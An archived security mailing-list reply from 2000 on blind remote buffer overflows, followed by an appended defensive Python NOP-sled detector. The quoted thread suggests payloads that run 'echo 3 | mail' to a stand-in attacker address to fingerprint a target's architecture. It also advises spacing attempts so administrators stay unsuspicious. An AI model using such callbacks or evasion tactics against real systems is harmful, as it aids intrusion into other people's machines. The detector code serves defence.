Vulnerability Development mailing list archives

Re: Blind Remote Buffer Overflow


From: matej () POBOX SK (matej)
Date: Tue, 2 May 2000 08:24:46 +0200


On Mon, May 01, 2000 at 05:59:05PM -0700, Blue Boar wrote:
> Some people have mentioned some ways to try to find a vulnerability
> remotely. Now, let's say that, using some method, you have determined you
> can rewrite EIP, PC (or whatever it's called on your architecture). What do
> you do now to detect the operating system and architecture?

> In many cases, you will have more than one shot at trying your
> buffer overflow.  One possibility is just trying them all.  If the
> service doesn't auto-restart, then try each arch a week apart, so the
> admin doesn't get suspicious.

...or try in one shot 3 bufflows for 3 hw platforms :-)

> a number of variants (as an example: Linux/i386, Linux/sparc,
> Windows/i386) which all do something like "echo 3 | mail
> badguy () test com". Depending upon what mail you actually get back, you know
> that the architecture is at least quite compatible with the environments
> that return an answer.

> Who knows their x86 and Sparc opcodes really well?

on x86 I can find a couple of such instructions - ranging from completely
NOP-like, to some form of semi-NOPs. just think of 'mov eax, eax' or 'jmp
$+length_of_instr', or take some of the semi-NOPs - 'and eax, eax' (changes
flags, as well as 'or' etc), and think about some instruction pairs - like
'cmc; cmc' (complement carry, twice ;-)

however, I know _nothing_ about the sparc instr set...

matej
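A defender's-side use of the x86 semi-NOP inventory discussed above, as an added example that is not part of this thread: a small Python scanner that looks for runs of these NOP-equivalent instructions in a captured payload, the way a network IDS flags a NOP sled. The opcode table `NOP_LIKE`, the `Run` type, the threshold in `looks_like_sled` and the sample buffers are my own assumptions and constructed data, not from the post.

```python
# NOP-sled detector for the x86 NOP-equivalents named in the thread.
# Added example: encodings are 32-bit x86 (assumed from the Intel manual),
# and the sample buffers at the bottom are constructed, not captured.
from __future__ import annotations
from dataclasses import dataclass, field

# Instruction forms from the thread and their machine-code encodings.
NOP_LIKE = {
    b"\x90": "nop",
    b"\x89\xc0": "mov eax, eax",
    b"\x8b\xc0": "mov eax, eax",   # alternate encoding (MOV r32, r/m32)
    b"\x21\xc0": "and eax, eax",   # semi-NOP: only the flags change
    b"\x23\xc0": "and eax, eax",
    b"\x09\xc0": "or eax, eax",
    b"\x0b\xc0": "or eax, eax",
    b"\xf5\xf5": "cmc; cmc",       # complementing CF twice restores it
    b"\xeb\x00": "jmp $+2",        # short jump to the next instruction
}
MAX_LEN = max(len(k) for k in NOP_LIKE)


@dataclass
class Run:
    offset: int = 0
    length: int = 0                 # run length in bytes
    mnemonics: list[str] = field(default_factory=list)


def longest_nop_run(data: bytes) -> Run:
    """Return the longest run of consecutive NOP-equivalent instructions.
    Every byte offset is tried as a start, so unaligned runs are found too."""
    best = Run()
    for start in range(len(data)):
        pos, names = start, []
        while pos < len(data):
            for width in range(MAX_LEN, 0, -1):   # longest match first
                chunk = data[pos:pos + width]
                if chunk in NOP_LIKE:
                    names.append(NOP_LIKE[chunk])
                    pos += width
                    break
            else:
                break                             # not NOP-like: run ends
        if pos - start > best.length:
            best = Run(start, pos - start, names)
    return best


def looks_like_sled(data: bytes, min_bytes: int = 16) -> bool:
    """Flag a buffer whose longest NOP-equivalent run reaches min_bytes."""
    return longest_nop_run(data).length >= min_bytes


# Constructed samples: a mixed-form sled, and an ordinary request line.
SAMPLE_SLED = b"\x90" * 8 + b"\x89\xc0\x21\xc0\xf5\xf5\xeb\x00" + b"\x31\xc0"
SAMPLE_BENIGN = b"GET / HTTP/1.0\r\n"
```

A single `cmc` is deliberately not in the table, so only the self-cancelling pair counts; a real IDS rule would also need a threshold tuned against benign binary traffic, where `0x90` bytes occur legitimately.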

